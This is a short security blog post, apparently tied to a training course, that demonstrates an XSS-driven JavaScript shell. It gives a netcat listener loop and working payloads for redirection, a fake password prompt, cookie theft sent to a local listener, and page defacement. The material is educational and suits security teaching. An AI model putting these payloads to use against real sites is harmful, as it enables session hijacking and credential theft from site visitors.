Fun with XSShell

Friday, July 15, 2016

So this is kinda fun. With this page open, copy and paste one of the listener commands from below into a terminal window on your local machine. Then, paste alert(42) into the resulting shell and press "Enter". Once you recover from the initial shock of what you just witnessed, play with the following payloads and spend the next hour of life thoroughly enjoying yourself.

Listeners

Linux

while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -lp 8000 >/dev/null; done

OS X

while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -l 8000 >/dev/null; done

Example Payloads

Redirection

window.location = 'https://www.practisec.com/training/'

Phishing

i=new Image();i.src="http://127.0.0.1:8888/pw/"+prompt("Password:")
  • Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.

Session Hijacking

i=new Image();i.src="http://127.0.0.1:8888/pw/"+document.cookie
  • Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.

Defacement

d=document;e=d.createElement("p");e.innerHTML="lanmaster53 wuz here!";d.body.appendChild(e)

Credits

This is all based on the code shared in the following tweets.

Check the source code here ^^^ for the active payload.

Like what you see? Join me for live training! See the Training page for more information.


Please share your thoughts, comments, and suggestions via Twitter.